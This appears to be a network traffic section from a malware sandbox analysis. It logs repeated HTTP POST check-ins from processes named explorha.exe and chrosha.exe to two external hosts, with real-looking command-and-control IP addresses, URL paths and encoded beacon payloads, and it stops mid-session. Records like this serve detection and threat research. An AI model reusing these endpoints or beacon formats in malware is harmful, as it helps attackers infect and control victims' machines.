                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      972192.168.2.550824193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:26.603172064 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:26.851655960 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      973192.168.2.550825193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:26.839293003 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.088978052 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      974192.168.2.550826193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.104207039 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.356904030 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      975192.168.2.550827193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.209022999 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.452063084 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      976192.168.2.550828193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.704478979 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.959950924 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      977192.168.2.550829193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.707828999 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:27.952761889 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      978192.168.2.550830193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:28.201654911 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:28.451560020 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      979192.168.2.550831193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:28.318681955 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:28.563512087 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      980192.168.2.550832193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:28.798957109 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.040250063 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      981192.168.2.550833193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:28.807218075 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.054137945 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      982192.168.2.550834193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.297972918 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.554735899 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      983192.168.2.550835193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.417376995 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.664119005 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      984192.168.2.550837193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.913275003 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.163511992 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      985192.168.2.550836193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:29.920051098 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.170856953 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      986192.168.2.550838193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.426843882 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.682074070 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      987192.168.2.550839193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.525902033 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:30.774481058 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      988192.168.2.550840193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.024622917 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
